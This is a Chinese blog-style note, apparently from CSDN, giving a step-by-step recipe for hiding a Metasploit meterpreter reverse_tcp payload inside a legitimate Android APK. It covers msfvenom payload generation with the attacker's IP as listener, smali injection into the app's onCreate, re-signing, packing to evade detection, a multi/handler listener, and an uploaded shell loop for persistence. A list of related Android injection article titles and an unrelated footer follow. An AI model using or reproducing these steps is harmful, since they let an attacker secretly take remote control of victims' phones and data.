参考了网络很多大神文章,简单小结一下,仅供参考
1,msfvenom -p android/meterpreter/reverse_tcp LHOST=本机IP LPORT=监听端口号 -o virus.apk
2,apktook反编译virus.apk和normal.apk
3,找normal.apk入口,normal.apk的androidManifest.xml文件中查找MainActivety和Launch关键词,
4,找到com/xxx/xxx/MainActivety.smail文件并搜索onCreat函数,找到bundle对象在下面添加启动payload: invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
5,把virus.apk的smail文件(payload的smail/com/metasploit文件),复制到normal.apk的smail/com/目录下
6,androidManifest.xml 添加权限permission
7,回编译 //https://blog.csdn.net/weixin_44212888/article/details/111396635
8,签名 //https://blog.csdn.net/weixin_44212888/article/details/111396635
9,加壳 //百度"加壳工具"
10,service postgresql start //启动数据库
11,msfconsole //启动msf
12,use exploit/multi/handler //加载攻击模块
13,set payload android/meterpreter/reverse_tcp //选择要使用的Payload
14,show options //查看需要设置的参数
15,exploit //执行
16,持续监听编写一个sh脚本,保存桌面并赋权限
#! /bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN(action标签) -n com.metasploit.stage/.MainActivity
sleep 20
done
meterpreter > pwd //找到当前路径
meterpreter > upload /root/桌面/chixu.sh //上传脚本
meterpreter > shell //输入shell
pwd
/
cd /data/user/0/com.baidu.flashlight/files //找到脚本所在文件夹
ls
chixu.sh
sh chixu.sh //运行脚本
msf支持上线自动执行命令,设置InitialAutoRunScript或autorunscript可以让你上线的session自动上传并执行脚本

Android payload注入相关推荐

  1. Android 依赖注入: Dagger 2 实例解说(一)

    本文原创,转载请注明出处:http://blog.csdn.net/zjbpku [Duplicated]   link to  Dagger on Android - Dagger2具体解释 关于D ...

  2. 【Android 逆向】Android 进程注入工具开发 ( 总结 | 源码编译 | 逆向环境搭建使用 | 使用进程注入工具进行逆向操作 ) ★★★

    文章目录 一.Android 进程注入工具开发系列博客 二.Android 进程注入工具 源码下载编译 三.逆向环境搭建 四.使用注入工具进行逆向操作 1.获取远程进程号 2.注入工具准备 3.注入动 ...

  3. 【Android 逆向】Android 进程注入工具开发 ( 远程调用 | x86 架构的返回值获取 | arm 架构远程调用 )

    文章目录 前言 一.x86 架构的返回值获取 二.ARM 架构远程调用 前言 在之前的博客 [Android 逆向]Android 进程注入工具开发 ( 注入代码分析 | 获取 远程 目标进程 中的 ...

  4. 【Android 逆向】Android 进程注入工具开发 ( 注入代码分析 | 注入工具收尾操作 | 关闭注入的动态库 | 恢复寄存器 | 脱离远程调试附着 )

    文章目录 一.dlclose 函数简介 二.关闭注入的 libbridge.so 动态库 三.恢复寄存器 四.脱离远程调试附着 一.dlclose 函数简介 dlclose 函数的作用是 卸载一个 指 ...

  5. 【Android 逆向】Android 进程注入工具开发 ( 注入代码分析 | 获取注入的 libbridge.so 动态库中的 load 函数地址 并 通过 远程调用 执行该函数 )

    文章目录 一.dlsym 函数简介 二.获取 目标进程 linker 中的 dlsym 函数地址 三.远程调用 目标进程 linker 中的 dlsym 函数 获取 注入的 libbridge.so ...

  6. 【Android 逆向】Android 进程注入工具开发 ( 注入代码分析 | 获取 linker 中的 dlopen 函数地址 并 通过 远程调用 执行该函数 )

    文章目录 一.dlopen 函数简介 二.获取 目标进程 linker 中的 dlopen 函数地址 三.远程调用 目标进程 linker 中的 dlopen 函数 一.dlopen 函数简介 dlo ...

  7. 【Android 逆向】Android 进程注入工具开发 ( 注入代码分析 | 远程调用 目标进程中 libc.so 动态库中的 mmap 函数 三 | 等待远程函数执行完毕 | 寄存器获取返回值 )

    文章目录 前言 一.等待远程进程 mmap 函数执行完毕 二.从寄存器中获取进程返回值 三.博客资源 前言 前置博客 : [Android 逆向]Android 进程注入工具开发 ( 注入代码分析 | ...

  8. 【Android 逆向】Android 进程注入工具开发 ( 注入代码分析 | 远程调用 目标进程中 libc.so 动态库中的 mmap 函数 二 | 准备参数 | 远程调用 mmap 函数 )

    文章目录 一.准备 mmap 函数的参数 二.mmap 函数远程调用 一.准备 mmap 函数的参数 上一篇博客 [Android 逆向]Android 进程注入工具开发 ( 注入代码分析 | 远程调 ...

  9. 【Android 逆向】Android 进程注入工具开发 ( 注入代码分析 | 调试进程 ATTACH 附着目标进程 | 读取目标函数寄存器值并存档 )

    文章目录 一.调试进程 ATTACH 附着目标进程 二.读取目标函数寄存器值并存档 1.主要操作流程 2.ptrace 函数 PTRACE_GETREGS 读取寄存器值 一.调试进程 ATTACH 附 ...

最新文章

  1. 给你的网站穿上外衣 - HTTPS 免费部署指南
  2. 10个免费在线逻辑关系图表图形设计制作工具
  3. UITableVIew的性能优化-重用原理
  4. 加载torchvision中预训练好的模型并修改默认下载路径
  5. 【搜索引擎基础知识2】网络爬虫
  6. Python--简单的目录扫描脚本
  7. 清北·NOIP2017济南考前冲刺班 DAY1 morning
  8. android保存字符到sd卡,android 保存TXT文件到SD卡方法
  9. lua虚拟机字节码修改_LUA虚拟机的字节码怎么看?
  10. 扩展CheckBoxList实现选中绑定
  11. python基础其他(二十一)
  12. 由于BOM头导致的Json解析出错
  13. JavaWeb——Servlet(入门必备,web请求与响应的底层)
  14. CAS单点登录(SSO)
  15. oracle 自增长这么使用,Eova Oracle 自增长的处理
  16. pdf关键字搜索盖章,长关键字定位
  17. python图像分类实验总结_第4章 图像分类(image classification)基础
  18. html页面布局主要有哪些形式,HTML页面布局形式与原则
  19. Eureka 源码解析 —— Eureka-Server 集群同步
  20. 巨人就在你的身边——14期英语反馈表彰大会有感

热门文章

  1. 发几个很二的笑话让大家笑一下!笑一笑,十年少.
  2. site about oo
  3. 云服务器好还是高防服务器好
  4. Mysql + Mybatis批量更新报错 BadSqlGrammarException
  5. 高等数学公式大全(二)
  6. 工作流平台airflow简介
  7. 哈夫曼树的构造C/C++代码实现
  8. linux defunct 进程,Defunct进程(死进程)
  9. defunct(DEFUNCTRUEGO)
  10. springboot毕设项目漫语在线论坛设计与实现5i5u1(java+VUE+Mybatis+Maven+Mysql)